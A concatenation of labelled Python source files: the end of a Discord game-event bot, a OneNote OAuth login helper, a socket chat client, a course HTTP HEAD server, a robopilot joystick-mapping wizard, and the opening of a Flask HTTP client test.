        # Map the numeric event id onto its localized name/description.
        for entry in eventy_json["metagame_event_list"]:
            if event_id == int(entry["metagame_event_id"]):
                return entry["name"]["en"], entry["description"]["en"], running_time, factionPercentage
    print("no event running")
    return "N/A"  # unknown state or unknown event id
async def sendHelloInfo(message):
    """Reply to the '?hi' command with a greeting embed."""
    embed_color = discord.colour.Color.from_rgb(236, 88, 9)
    greeting = discord.Embed(title="UwU", description="Hello {}".format(message.author), color=embed_color)
    greeting.set_image(url="https://cdn.betterttv.net/emote/60448132306b602acc598647/3x.gif")
    await message.channel.send(embed=greeting)
async def sendAlertInfo(message, server):
    """Send an embed describing the currently running event on *server*.

    Args:
        message: The triggering discord message (reply goes to its channel).
        server: Lower-cased server name; unknown names get an error reply.
    """
    orange = discord.colour.Color.from_rgb(236, 88, 9)
    # Census API world ids keyed by lower-cased server name.
    serverDict = {
        "connery" : 1,
        "cobalt" : 13,
        "miller" : 10,
        "emerald" : 17,
        "soltech" : 40,
        "jaeger" : 19
    }
    # BUG FIX: only the dictionary lookup can mean a wrong server name.
    # The original wrapped getEventInfo() in the same bare except, so any
    # failure inside it was misreported as "Wrong server name".
    try:
        world_id = serverDict[server]
    except KeyError:
        await message.channel.send("Wrong server name")
        return
    info = getEventInfo(world_id)
    if (info == "N/A"):
        await message.channel.send("No info available")
        return
    if (info == "ENDED"):
        alert_embed = discord.Embed(title=f"Currently running events on {server}:",
                                    description="There is no event running at the moment", color=orange)
        await message.channel.send(embed=alert_embed)
    else:
        alert_embed = discord.Embed(title=f"Currently running events on {server}:", description="\n", color=orange)
        alert_embed.add_field(name=info[0], value=info[1] + "\n" + "Elapsed time: " + info[2] + " minutes", inline=True)
        alert_embed.add_field(name="Current score", value=info[3][0] + " " + info[3][1] + " " + info[3][2], inline=True)
        alert_embed.set_footer(text=message.author,
                               icon_url="https://logo-logos.com/wp-content/uploads/2018/03/discordlogo.png")
        await message.channel.send(embed=alert_embed)
async def sendHelpInfo(message):
    """Reply to the '?help' command with an embed listing bot commands."""
    embed_color = discord.colour.Color.from_rgb(236, 88, 9)
    commands_embed = discord.Embed(title="Help", description="Usable bot commands: ", color=embed_color)
    commands_embed.add_field(name="?alert info [server name]", value="prints out the current status on given server.",
                             inline=False)
    commands_embed.add_field(name="?hi", value="show the bot some attention and love.", inline=False)
    await message.channel.send(embed=commands_embed)
async def sendDevMessages(message, contents):
    """Log *contents* to the console with a timestamp and echo it to the channel."""
    print(f"{getTime()} {contents}")
    await message.channel.send(contents)
def getTime():
    """Return the current wall-clock time formatted as '[HH:MM:SS]:'."""
    return f"[{datetime.now():%H:%M:%S}]:"
def console_print(contents):
    """Print *contents* prefixed with a '[HH:MM:SS]:' timestamp.

    BUG FIX: the original called "{0} {1}".format(getTime()) with a single
    argument for two placeholders, raising IndexError on every call.
    """
    print("{0} {1}".format(getTime(), contents))
def background_check(message):
    """Worker-thread body: print a heartbeat every 5 s while the module-level
    checking_enabled flag stays True."""
    global something_is_up  # declared but never assigned here; kept as-is
    while True:
        if not checking_enabled:
            break
        print("standard threading loop is running too")
        time.sleep(5)
async def background_check_asynchronous(message):
    """Async poller: every 120 s, fetch event info for world 13 (Cobalt) and
    post an alert embed whenever a live event is found."""
    while checking_enabled:
        print("henlo, async loop bezi")
        await asyncio.sleep(120)
        event_info = getEventInfo(13)
        if event_info not in ("N/A", "ENDED"):
            print("info contains: " + str(event_info))
            await sendAlertInfo(message, "cobalt")
def main():
    """Entry point: load the bot token, register event handlers, run the bot."""
    load_dotenv()
    TOKEN = os.getenv('TOKEN')
    if (TOKEN == None):
        print("Error: .env file with bot token not found.")
        sys.exit(1)
    client = discord.Client()
    @client.event
    async def on_ready():
        print("{0} Logged in as {1.user}".format(getTime(), client))
    @client.event
    async def on_message(message):
        # Ignore the bot's own messages to avoid feedback loops.
        if message.author == client.user:
            return
        # maybe define a complete premade embed instead of just color later
        orange = discord.colour.Color.from_rgb(236, 88, 9)
        if message.content == "?hi":
            await sendHelloInfo(message)
        if message.content == "?help":
            await sendHelpInfo(message)
        if message.content.startswith("?alert info"):
            server = str(message.content).split()[-1].lower()
            # Bare "?alert info" (last word == "info") defaults to Cobalt.
            if server == "info":
                await sendAlertInfo(message, "cobalt")
            else:
                await sendAlertInfo(message, server)
        # NOTE(review): a fresh (unstarted) thread object is created for every
        # incoming message; it is only started by the ?en command below, so
        # repeated ?en commands spawn multiple background threads.
        bg_thread = threading.Thread(name='background', target=background_check, args=[message])
        if message.content == "?enable notifications" or message.content == "?en":
            global checking_enabled
            checking_enabled = True
            asyncio.create_task(background_check_asynchronous(message)) # edit to make sure the create_task method is not spawning more threads each time the check is activated!!
            if not bg_thread.is_alive():
                bg_thread.start()
            await sendDevMessages(message, "Automatic event check has been enabled")
        if message.content == "?disable notifications" or message.content == "?dn":
            checking_enabled = False
            await sendDevMessages(message, "Automatic event check has been disabled")
    client.run(TOKEN)
# Standard script guard: only start the bot when run directly.
if __name__ == "__main__":
    main()
|
onenote_auth.py | from oauthlib.oauth2 import TokenExpiredError
from requests_oauthlib import OAuth2Session
import datetime
import json
import logging
import webbrowser
from contextlib import suppress
from http.server import HTTPServer, BaseHTTPRequestHandler
from pathlib import Path
from queue import Queue
from threading import Thread
from time import sleep
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
# Client id of the application registered in the Azure portal (see link below).
client_id = 'c55c98cc-9cf9-43dc-8e84-38b60cd514b5'
# Read-only OneNote access scope.
scope = ['Notes.Read']
auth_url = 'https://login.microsoftonline.com/common/oauth2/v2.0/authorize'
token_url = 'https://login.microsoftonline.com/common/oauth2/v2.0/token'
# Redirect URI registered at:
# https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/RegisteredAppsPreview
redirect_uri = 'http://localhost:8000/auth'
# The cached auth token is stored in the user's home directory.
token_path = Path.home() / '.onenote-dump-token'
def get_session(new: bool = False):
    """Return an authorized OAuth2 session.

    Tries the token saved on disk first; falls back to the interactive user
    authorization flow when the token is missing, expired, or *new* is True.
    """
    try:
        session = session_from_saved_token(new)
    except (IOError, TokenExpiredError):
        session = session_from_user_auth()
    return session
def session_from_saved_token(new):
    """Build an OAuth2 session from the token cached on disk.

    Raises TokenExpiredError when *new* is requested or the token is about
    to expire, and an IOError when no token file exists.
    """
    if new:
        logger.info('Ignoring saved auth token.')
        logger.info(
            'NOTE: To switch accounts, you may need to delete all browser '
            'cookies for login.live.com and login.microsoftonline.com.'
        )
        _delete_token()
        raise TokenExpiredError
    token = _load_token()
    # Treat tokens expiring within the next five minutes as already expired
    # so a request started now cannot outlive the token.
    cutoff = datetime.datetime.now() + datetime.timedelta(minutes=5)
    if datetime.datetime.fromtimestamp(token['expires_at']) < cutoff:
        logger.debug('Saved token expired.')
        raise TokenExpiredError
    return OAuth2Session(client_id, token=token)
def session_from_user_auth():
    """Get an authenticated session by having the user authorize access."""
    # Run a throwaway local HTTP server to catch the OAuth redirect.
    server = AuthHTTPServer(redirect_uri)
    server.start()
    # Give the server a moment to start.
    # More elegant would be to wait until it responds with a 200.
    sleep(3)
    s = OAuth2Session(
        client_id,
        scope=scope,
        redirect_uri=redirect_uri,
        token_updater=_save_token,
    )
    authorization_url, state = s.authorization_url(auth_url)
    logger.info('Launching browser to authorize... %s', authorization_url)
    webbrowser.open(authorization_url)
    # Blocks until the browser is redirected back to the local server.
    redirect_url = server.wait_for_auth_redirect()
    token = s.fetch_token(
        token_url=token_url,
        client_id=client_id,
        authorization_response=redirect_url,
        include_client_id=True,
    )
    _save_token(token)
    return s
class _AuthServerHandler(BaseHTTPRequestHandler):
    """Acknowledges the OAuth redirect and forwards its path to the owner."""

    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        # Echo the path back so the user sees a confirmation in the browser.
        self.wfile.write(b'Request received: ' + self.path.encode())
        logger.debug('Queueing %s', self.path)
        # self.server is the HTTPServer; AuthHTTPServer attaches a Queue to
        # it before serving (see AuthHTTPServer._run_server).
        self.server.queue.put(self.path)
class AuthHTTPServer:
    """Tiny local HTTP server used to catch the OAuth authorization redirect.

    Note that on Windows this will trigger a "Windows Security Alert" and
    prompt the user to allow access through the firewall.
    """

    def __init__(self, url):
        self.url = urlparse(url)
        self.queue = Queue()
        self.server = None

    def start(self):
        """Run the HTTP server on a background thread."""
        worker = Thread(target=self._run_server, name='HTTPServer')
        worker.start()

    def wait_for_auth_redirect(self):
        """Block until a request whose path matches the redirect URI arrives."""
        received = ''
        while self.url.path not in received:
            received = self.queue.get()
            logger.debug('Received %s', received)
        logger.debug('Matched expected redirect; stopping server.')
        self.server.shutdown()
        return received

    def _run_server(self):
        # Bind on all interfaces at the redirect URI's port and attach the
        # queue so the request handler can report paths back to us.
        self.server = HTTPServer(('', self.url.port), _AuthServerHandler)
        self.server.queue = self.queue
        self.server.serve_forever()
def _save_token(token):
    """Persist the OAuth token as JSON in the user's home directory."""
    serialized = json.dumps(token)
    token_path.write_text(serialized)
    logger.debug('Auth token saved to %s', token_path)
def _load_token():
    """Read and deserialize the OAuth token saved on disk."""
    raw = token_path.read_text()
    token = json.loads(raw)
    logger.debug('Auth token loaded from %s', token_path)
    return token
def _delete_token():
    """Remove the saved token file; a missing file is not an error."""
    try:
        token_path.unlink()
    except FileNotFoundError:
        pass
|
client3.py | import socket
import sys
from threading import Thread
def send_message(name):
    """Read lines from stdin and send them to the server as 'name__text'."""
    while True:
        text = input()
        payload = f"{name}__{text}"
        sock.sendall(payload.encode())
        if text == "exit":
            # Typing 'exit' terminates this client after notifying the server.
            sock.close()
            sys.exit()
def receive_message():
    """Continuously receive 'username__message' frames and print them."""
    while True:
        data = sock.recv(1024)
        # Decode once and split on the FIRST '__' only.
        # BUG FIX: the original decoded twice and used split('__')[1], which
        # truncated any message containing '__' and raised IndexError when
        # no separator was present.
        username, _, message = data.decode().partition('__')
        print(f"{username}: {message.strip()}")
# Connect to the local chat server, then run the send and receive loops on
# two separate threads.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 1235))
name = input("Username: ")
if not name:
    # An empty username aborts the client before any threads start.
    sock.close()
    sys.exit(1)
send_thread = Thread(target=send_message, args=[name])
get_thread = Thread(target=receive_message)
send_thread.start()
get_thread.start() |
EchoServerPlusHead.py | #!/usr/bin/env python3
# See https://docs.python.org/3.2/library/socket.html
# for a description of python socket and its parameters
#
# Copyright 2018, Shaden Smith, Koorosh Vaziri,
# Niranjan Tulajapure, Ambuj Nayab, Akash Kulkarni, and Daniel J. Challou
# for use by students enrolled in Csci 4131 at the University of
# Minnesota-Twin Cities only. Do not reuse or redistribute further
# without the express written consent of the authors.
#
import socket
#add the following
import socket
import os
import stat
import sys
import urllib.parse
import datetime
from threading import Thread
from argparse import ArgumentParser
# Maximum number of bytes read per socket recv() call.
BUFSIZE = 4096
#add the following
CRLF = '\r\n'
# Pre-built HTTP/1.1 response status lines plus headers (no bodies).
METHOD_NOT_ALLOWED = 'HTTP/1.1 405 METHOD NOT ALLOWED{}Allow: GET, HEAD{}Connection: close{}{}'.format(CRLF, CRLF, CRLF, CRLF)
OK = 'HTTP/1.1 200 OK{}{}{}'.format(CRLF, CRLF, CRLF)
NOT_FOUND = 'HTTP/1.1 404 NOT FOUND{}Connection: close{}{}'.format(CRLF, CRLF, CRLF)
FORBIDDEN = 'HTTP/1.1 403 FORBIDDEN{}Connection: close{}{}'.format(CRLF, CRLF, CRLF)
# 301 redirect used for the special 'csumn' resource alias.
MOVED_PERMANENTLY = 'HTTP/1.1 301 MOVED PERMANENTLY{}Location: https://www.cs.umn.edu/{}Connection: close{}{}'.format(CRLF, CRLF, CRLF, CRLF)
def get_contents(fname):
    """Return the full text content of the file at *fname*."""
    with open(fname, 'r') as infile:
        contents = infile.read()
    return contents
def check_perms(resource):
    """Returns True if resource has read permissions set on 'others'"""
    mode = os.stat(resource).st_mode
    return bool(mode & stat.S_IROTH)
def client_talk(client_sock, client_addr):
    """Print everything received from client_sock until the peer closes."""
    print('talking to {}'.format(client_addr))
    chunk = client_sock.recv(BUFSIZE)
    while chunk:
        print(chunk.decode('utf-8'))
        chunk = client_sock.recv(BUFSIZE)
    # Orderly shutdown of the write side, then close the socket.
    client_sock.shutdown(1)
    client_sock.close()
    print('connection closed.')
class HTTP_HeadServer: #A re-worked version of EchoServer
    """Minimal threaded HTTP server that only answers HEAD requests."""

    def __init__(self, host, port):
        """Bind to (host, port) and serve forever (accept() never returns)."""
        print('listening on port {}'.format(port))
        self.host = host
        self.port = port
        self.setup_socket()
        self.accept()
        # Unreachable in practice (accept() loops forever), but kept for
        # symmetry.  BUG FIX: shutdown() requires a 'how' argument; the
        # original bare self.sock.shutdown() would raise TypeError.
        self.sock.shutdown(socket.SHUT_RDWR)
        self.sock.close()

    def setup_socket(self):
        """Create, bind, and start listening on the server socket."""
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((self.host, self.port))
        self.sock.listen(128)

    def accept(self):
        """Accept clients forever, handling each request on its own thread."""
        while True:
            (client, address) = self.sock.accept()
            th = Thread(target=self.accept_request, args=(client, address))
            th.start()

    def accept_request(self, client_sock, client_addr):
        """Read one request from client_sock, send the response, and close."""
        print("accept request")
        data = client_sock.recv(BUFSIZE)
        req = data.decode('utf-8')
        response = self.process_request(req)
        client_sock.send(bytes(response, 'utf-8'))
        # Close the client connection; the listening socket stays open.
        client_sock.shutdown(1)
        client_sock.close()

    def process_request(self, request):
        """Dispatch on the request method; only HEAD is implemented."""
        print('######\nREQUEST:\n{}######'.format(request))
        linelist = request.strip().split(CRLF)
        reqline = linelist[0]
        rlwords = reqline.split()
        if len(rlwords) == 0:
            return ''
        if rlwords[0] == 'HEAD':
            resource = rlwords[1][1:]  # skip beginning /
            return self.head_request(resource)
        return METHOD_NOT_ALLOWED

    def head_request(self, resource):
        """Handles HEAD requests: build the status line/headers for *resource*."""
        # 'csumn' is a special alias that 301-redirects to the CS dept site.
        if resource == 'csumn':
            return MOVED_PERMANENTLY
        if not os.path.exists(resource):
            return NOT_FOUND
        # 403 unless 'others' have read permission on the file.
        if not check_perms(resource):
            return FORBIDDEN
        return OK

    # To serve GET, read the resource contents (see get_contents) and append
    # them to the OK response after checking the request's Accept headers.
def parse_args():
    """Parse the --host / --port command line options for the server."""
    parser = ArgumentParser()
    parser.add_argument('--host', type=str, default='localhost',
                        help='specify a host to operate on (default: localhost)')
    parser.add_argument('-p', '--port', type=int, default=9001,
                        help='specify a port to operate on (default: 9001)')
    parsed = parser.parse_args()
    return (parsed.host, parsed.port)
if __name__ == '__main__':
    # Entry point: parse CLI options, then serve forever (blocks).
    (host, port) = parse_args()
    HTTP_HeadServer(host, port)  # Formerly EchoServer
|
joystick_creator.py | import sys
import os
import argparse
import json
import time
import math
from robopilot.utils import *
from robopilot.parts.controller import JoystickCreatorController
try:
from prettytable import PrettyTable
except:
print("need: pip install PrettyTable")
class CreateJoystick(object):
    """Interactive wizard that names a physical joystick's buttons and axes,
    maps them to robopilot controls, and writes out a python file containing
    Joystick/JoystickController subclasses for the user's project.
    """

    def __init__(self):
        # Most recent events recorded by the background polling thread.
        self.last_button = None
        self.last_axis = None
        self.axis_val = 0
        # Polling thread control.
        self.running = False
        self.thread = None
        # Axes that stream gyroscope data; ignored while naming/mapping.
        self.gyro_axis = []
        # (axis_name, control_fn) pairs mapped by the wizard.
        self.axis_map = []
        self.ignore_axis = False
        # (button_name, control_name) pairs mapped by the wizard.
        self.mapped_controls = []

    def poll(self):
        """Background loop: record the latest button or axis event."""
        while self.running:
            button, button_state, axis, axis_val = self.js.poll()
            if button is not None:
                self.last_button = button
                self.last_axis = None
                self.axis_val = 0.0
            elif axis is not None and not self.ignore_axis:
                # Skip axes identified as gyroscope streams.
                if axis not in self.gyro_axis:
                    self.last_axis = axis
                    self.last_button = None
                    self.axis_val = axis_val

    def get_button_press(self, duration=10.0):
        """Wait up to *duration* seconds for a button press; return its name
        or None on timeout."""
        self.last_button = None
        start = time.time()
        while self.last_button is None and time.time() - start < duration:
            time.sleep(0.1)
        return self.last_button

    def get_axis_move(self, duration=2.0):
        """Sample axis motion for *duration* seconds and return the axis that
        moved the most (largest accumulated |value|), or None."""
        self.last_axis = None
        axis_samples = {}
        start = time.time()
        while time.time() - start < duration:
            if self.last_axis:
                # dict.get() replaces the original's redundant nested
                # try/except accumulation.
                axis_samples[self.last_axis] = \
                    axis_samples.get(self.last_axis, 0.0) + math.fabs(self.axis_val)
            time.sleep(0.01)  # fixed: was a 100%-CPU busy wait

        most_movement = None
        most_val = 0
        for key, value in axis_samples.items():
            if value > most_val:
                most_movement = key
                most_val = value
        return most_movement

    def clear_scr(self):
        """Clear the terminal with an ANSI escape sequence."""
        print(chr(27) + "[2J")

    def create_joystick(self, args):
        """Run the complete wizard, step by step."""
        self.clear_scr()
        print("##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##")
        print("## Welcome to Joystick Creator Wizard. ##")
        print("##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##")
        print("This will generate code to use your joystick with a Robopilot.")
        print()
        print("Overview:")
        print()
        print("First we name each button, then each axis control.")
        print("Next we map names to actions.")
        print("Finally we output a python file you can use in your project.")
        print()
        input('Hit Enter to continue')
        self.clear_scr()
        print("Please plug-in your controller via USB or bluetooth. Make sure status lights are on and device is mapped.")
        input('Enter to continue ')
        self.clear_scr()
        self.init_js_device()
        print()
        self.init_polling_js()
        self.clear_scr()
        self.find_gyro()
        self.clear_scr()
        self.explain_config()
        self.clear_scr()
        self.name_buttons()
        self.clear_scr()
        self.name_axes()
        self.clear_scr()
        self.map_steering_throttle()
        self.clear_scr()
        self.map_button_controls()
        self.clear_scr()
        self.revisit_topic()
        self.clear_scr()
        self.write_python_class_file()
        print("Check your new python file to see the controller implementation. Import this in manage.py and use for control.")
        self.shutdown()

    def init_js_device(self):
        """Prompt for the joystick device file and open it (exits on refusal)."""
        from robopilot.parts.controller import JoystickCreatorController
        js_cr = None

        # Get device file and create js creator helper class.
        while js_cr is None:
            print("Where can we find the device file for your joystick?")
            dev_fn = input("Hit Enter for default: /dev/input/js0 or type alternate path: ")
            # Fixed: the original used "len(dev_fn) is 0" -- an identity
            # test against an int literal (SyntaxWarning on py3.8+).
            if len(dev_fn) == 0:
                dev_fn = '/dev/input/js0'
            print()
            print("Attempting to open device at that file...")
            try:
                js_cr = JoystickCreatorController(dev_fn=dev_fn)
                res = js_cr.init_js()
                if res:
                    print("Found and accessed input device.")
                else:
                    js_cr = None
            except Exception as e:
                print("threw exception:" + str(e))
                js_cr = None

            if js_cr is None:
                ret = input("Failed to open device. try again? [Y/n] : ")
                if ret.upper() == "N":
                    exit(0)

        self.js = js_cr.js
        input("Hit Enter to continue")

    def init_polling_js(self):
        """Start the daemon thread that polls joystick events."""
        self.running = True
        import threading
        self.thread = threading.Thread(target=self.poll)
        self.thread.daemon = True
        self.thread.start()

    def find_gyro(self):
        """Watch axis events for 5 seconds to identify gyroscope axes."""
        print("Next we are going to look for gyroscope data.")
        input("For 5 seconds, move controller and rotate on each axis. Hit Enter then start moving: ")
        start = time.time()
        while time.time() - start < 5.0:
            if self.last_axis is not None and self.last_axis not in self.gyro_axis:
                self.gyro_axis.append(self.last_axis)
            time.sleep(0.01)  # fixed: was a 100%-CPU busy wait
        print()
        if len(self.gyro_axis) > 0:
            print("Ok, we found %d axes that stream gyroscope data. We will ignore those during labelling and mapping." % len(self.gyro_axis))
        else:
            print("Ok, we didn't see any events. So perhaps your controller doesn't emit gyroscope data. No problem.")
        input("Hit Enter to continue ")

    def get_code_from_button(self, button):
        """Return the numeric code parsed from an 'unknown(0x..)' button
        string, the string itself for a named button, or None on a parse
        failure."""
        code = button
        if 'unknown' in button:
            try:
                code_str = button.split('(')[1][:-1]
                code = int(code_str, 16)
            except Exception as e:
                code = None
                print("failed to parse code", str(e))
        return code

    def explain_config(self):
        """Show the (initially empty) progress tables to the user."""
        print("We will display the current progress in this set of tables:")
        print()
        self.print_config()
        print("\nAs you name buttons and map them to controls this table will be updated.")
        input("Hit enter to continue")

    def name_buttons(self):
        """Interactively assign a name to every button the user presses."""
        done = False
        self.ignore_axis = True
        self.print_config()
        print('Next we will give every button a name. Not analog yet. We will do that next.')
        while not done:
            print('Tap a button to name it.')
            self.get_button_press()
            if self.last_button is None:
                print("No button was pressed in last 10 seconds. It's possible that your buttons all generate axis commands.")
                ret = input("Keep mapping buttons? [Y, n]")
                if ret == 'n':
                    break
            elif 'unknown' in self.last_button:
                code = self.get_code_from_button(self.last_button)
                if code is not None:
                    if code in self.js.button_names:
                        ret = input("This button has a name: %s. Are you done naming? (y/N) " % self.js.button_names[code])
                        if ret.upper() == "Y":
                            done = True
                            break
                    label = input("What name to give to this button:")
                    if len(label) == 0:
                        print("No name given. skipping.")
                    else:
                        self.clear_scr()
                        self.js.button_names[code] = label
                        self.print_config()
            else:
                print('got press: ', self.last_button)
        self.clear_scr()
        self.print_config()

    def print_config(self):
        """Render the button, axis, and control mapping tables."""
        pt = PrettyTable()
        pt.field_names = ["button code", "button name"]
        for key, value in self.js.button_names.items():
            pt.add_row([str(hex(key)), str(value)])
        print("Button Map:")
        print(pt)

        pt = PrettyTable()
        pt.field_names = ["axis code", "axis name"]
        for key, value in self.js.axis_names.items():
            pt.add_row([str(hex(key)), str(value)])
        print("Axis Map:")
        print(pt)

        pt = PrettyTable()
        pt.field_names = ["control", "action"]
        for button, control in self.mapped_controls:
            pt.add_row([button, control])
        for axis, control in self.axis_map:
            pt.add_row([axis, control])
        print("Control Map:")
        print(pt)

    def name_axes(self):
        """Interactively assign a name to every axis the user moves."""
        self.print_config()
        print()
        print('Next we are going to name all the axis you would like to use.')
        done = False
        self.ignore_axis = False
        while not done:
            print('Prepare to move one axis on the controller for 2 sec.')
            ret = input("Hit Enter to begin. D when done. ")
            if ret.upper() == 'D':
                break
            most_movement = self.get_axis_move()
            if most_movement is None:
                print("Didn't detect any movement.")
                res = input("Try again? [Y/n]: ")
                if res == "n":
                    done = True
                    break
                else:
                    continue
            if 'unknown' in most_movement:
                code_str = most_movement.split('(')[1][:-1]
                print('Most movement on axis code:', code_str)
                try:
                    code = int(code_str, 16)
                except Exception as e:
                    code = None
                    print("Failed to parse code", str(e))
                if code is not None:
                    label = input("What name to give to this axis: (D when done) ")
                    if len(label) == 0:
                        print("No name given. skipping.")
                    elif label.upper() == 'D':
                        done = True
                    else:
                        self.js.axis_names[code] = label
                        self.clear_scr()
                        self.print_config()
            else:
                print('Got axis: ', self.last_axis)
            print()

    def write_python_class_file(self):
        """Emit a python file containing the Joystick and JoystickController
        subclasses built from the collected names and mappings."""
        pyth_filename = None
        outfile = None
        while pyth_filename is None:
            print("Now we will write these values to a new python file.")
            pyth_filename = input("What is the name of python file to create joystick code? [default: my_joystick.py]")
            if len(pyth_filename) == 0:
                pyth_filename = 'my_joystick.py'
            print('using filename:', pyth_filename)
            print()
            try:
                outfile = open(pyth_filename, "wt")
            except OSError:
                ret = input("failed to open filename. Enter another filename? [Y,n]")
                if ret == "n":
                    break
                pyth_filename = None
        print()
        if outfile is not None:
            classname = input("What is the name of joystick class? [default: MyJoystick] ")
            if len(classname) == 0:
                classname = "MyJoystick"

            file_header = \
'''
from robopilot.parts.controller import Joystick, JoystickController


class %s(Joystick):
    #An interface to a physical joystick available at /dev/input/js0
    def __init__(self, *args, **kwargs):
        super(%s, self).__init__(*args, **kwargs)

''' % (classname, classname)

            outfile.write(file_header)

            # Emit the button/axis name dicts inside the generated __init__.
            outfile.write('        self.button_names = {\n')
            for key, value in self.js.button_names.items():
                outfile.write("            %s : '%s',\n" % (str(hex(key)), str(value)))
            outfile.write('        }\n\n\n')
            outfile.write('        self.axis_names = {\n')
            for key, value in self.js.axis_names.items():
                outfile.write("            %s : '%s',\n" % (str(hex(key)), str(value)))
            outfile.write('        }\n\n\n')

            js_controller = \
'''
class %sController(JoystickController):
    #A Controller object that maps inputs to actions
    def __init__(self, *args, **kwargs):
        super(%sController, self).__init__(*args, **kwargs)


    def init_js(self):
        #attempt to init joystick
        try:
            self.js = %s(self.dev_fn)
            self.js.init()
        except FileNotFoundError:
            print(self.dev_fn, "not found.")
            self.js = None
        return self.js is not None


    def init_trigger_maps(self):
        #init set of mapping from buttons to function calls

''' % (classname, classname, classname)

            outfile.write(js_controller)

            outfile.write('        self.button_down_trigger_map = {\n')
            for button, control in self.mapped_controls:
                outfile.write("            '%s' : self.%s,\n" % (str(button), str(control)))
            outfile.write('        }\n\n\n')
            outfile.write('        self.axis_trigger_map = {\n')
            for axis, control in self.axis_map:
                outfile.write("            '%s' : self.%s,\n" % (str(axis), str(control)))
            outfile.write('        }\n\n\n')
            outfile.close()
            print(pyth_filename, "written.")

    def map_control_axis(self, control_name, control_fn):
        """Ask the user to move an axis and map it to *control_fn*."""
        while True:
            axis = self.get_axis_action('Move the controller axis you wish to use for %s. Continue moving for 2 seconds.' % control_name)
            mapped = False
            if axis is None:
                print("No mapping for %s." % control_name)
            else:
                code = self.get_code_from_button(axis)
                # Accept either the raw code or an already-assigned name.
                for key, value in self.js.axis_names.items():
                    if key == code or value == code:
                        print('Mapping %s to %s.\n' % (value, control_name))
                        mapped = value
                        break
            if mapped:
                ret = input('Is this mapping ok? (y, N) ')
                if ret.upper() == 'Y':
                    self.axis_map.append((mapped, control_fn))
                    return
            else:
                ret = input('axis not recognized. try again? (Y, n) ')
                if ret.upper() == 'N':
                    return

    def map_steering_throttle(self):
        """Map one axis to steering and one to throttle."""
        self.axis_map = []
        self.print_config()
        print()
        print('Now we will create a mapping of controls to actions.\n')
        print("First steering.")
        self.map_control_axis("steering", "set_steering")
        self.clear_scr()
        self.print_config()
        print()
        print("Next throttle.")
        self.map_control_axis("throttle", "set_throttle")

    def map_button_controls(self):
        """Let the user assign named buttons to the remaining controls."""
        unmapped_controls = [
            ('toggle_mode', 'changes the drive mode between user, local, and local_angle'),
            ('erase_last_N_records', 'erases the last 100 records while driving'),
            ('emergency_stop', 'executes a full back throttle to bring car to a quick stop'),
            ('increase_max_throttle', 'increases the max throttle, also used for constant throttle val'),
            ('decrease_max_throttle', 'decreases the max throttle, also used for constant throttle val'),
            ('toggle_constant_throttle', 'toggle the mode of supplying constant throttle'),
            ('toggle_manual_recording', 'toggles recording records on and off')
        ]
        self.mapped_controls = []
        self.print_config()
        print()
        print("Next we are going to assign button presses to controls.")
        print()
        while len(unmapped_controls) > 0:
            pt = PrettyTable()
            pt.field_names = ['Num', 'Control', 'Help']
            print("Unmapped Controls:")
            for i, td in enumerate(unmapped_controls):
                # 'help_text' avoids shadowing the builtin help().
                control, help_text = td
                pt.add_row([i + 1, control, help_text])
            print(pt)
            print()
            try:
                ret = " "
                while (not ret.isdigit() and ret.upper() != 'D') or (ret.isdigit() and (int(ret) < 1 or int(ret) > len(unmapped_controls))):
                    ret = input("Press the number of control to map (1-%d). D when done. " % len(unmapped_controls))
                if ret.upper() == 'D':
                    break
                iControl = int(ret) - 1
            except Exception:
                continue
            print('Press the button to map to control:', unmapped_controls[iControl][0])
            self.get_button_press()
            if self.last_button is None:
                print("No button was pressed in last 10 seconds.")
                ret = input("Keep mapping commands? [Y, n]")
                if ret == 'n':
                    break
            else:
                code = self.get_code_from_button(self.last_button)
                if code in self.js.button_names:
                    button_name = self.js.button_names[code]
                else:
                    button_name = self.last_button
                self.mapped_controls.append((button_name, unmapped_controls[iControl][0]))
                unmapped_controls.pop(iControl)
                self.clear_scr()
                self.print_config()
                print()
        print('done mapping controls')
        print()

    def revisit_topic(self):
        """Offer the user a chance to redo any wizard step before writing."""
        done = False
        while not done:
            self.clear_scr()
            self.print_config()
            print("Now we are nearly done! Are you happy with this config or would you like to revisit a topic?")
            print("H)appy, please continue to write out python file.")
            print("B)uttons need renaming.")
            print("A)xes need renaming.")
            print("T)hrottle and steering need remap.")
            print("R)emap buttons to controls.")
            ret = input("Select option ").upper()
            if ret == 'H':
                done = True
            elif ret == 'B':
                self.name_buttons()
            elif ret == 'A':
                self.name_axes()
            elif ret == 'T':
                self.map_steering_throttle()
            elif ret == 'R':
                self.map_button_controls()

    def get_axis_action(self, prompt):
        """Prompt and return the most-moved axis, or None if the user quits."""
        while True:
            print(prompt)
            ret = input("Hit Enter to begin. D when done. ")
            if ret.upper() == 'D':
                return None
            most_movement = self.get_axis_move()
            if most_movement is None:
                print("Didn't detect any movement.")
                res = input("Try again? [Y/n]: ")
                if res == "n":
                    return None
                else:
                    continue
            return most_movement

    def shutdown(self):
        """Stop the polling thread."""
        self.running = False
        if self.thread:
            # Daemon thread; join briefly so poll() can observe running=False.
            self.thread.join(timeout=1.0)
            self.thread = None

    def parse_args(self, args):
        """Parse (currently empty) createjs command line options."""
        parser = argparse.ArgumentParser(prog='createjs', usage='%(prog)s [options]')
        parsed_args = parser.parse_args(args)
        return parsed_args

    def run(self, args):
        """Entry point: run the wizard, shutting down cleanly on Ctrl-C."""
        args = self.parse_args(args)
        try:
            self.create_joystick(args)
        except KeyboardInterrupt:
            self.shutdown()
|
test_http_client.py | from mock_decorators import setup, teardown
from flask import Flask, request
from threading import Thread
import urllib2
import os
import ssl
import time
@setup('HTTP GET & POST requests')
def setup_http_get(e):
    """Start a local Flask app on port 8088 used by the HTTP GET/POST tests.

    NOTE(review): this module imports urllib2, so it targets Python 2.
    """
    app = Flask(__name__)

    def shutdown_server():
        # Werkzeug-specific shutdown hook; only available when running
        # under the Werkzeug development server.
        func = request.environ.get('werkzeug.server.shutdown')
        if func is None:
            raise RuntimeError('Not running with the Werkzeug Server')
        func()

    @app.route('/shutdown')
    def shutdown():
        shutdown_server()
        return 'Server shutting down...'

    @app.route("/", methods = ['GET', 'POST'])
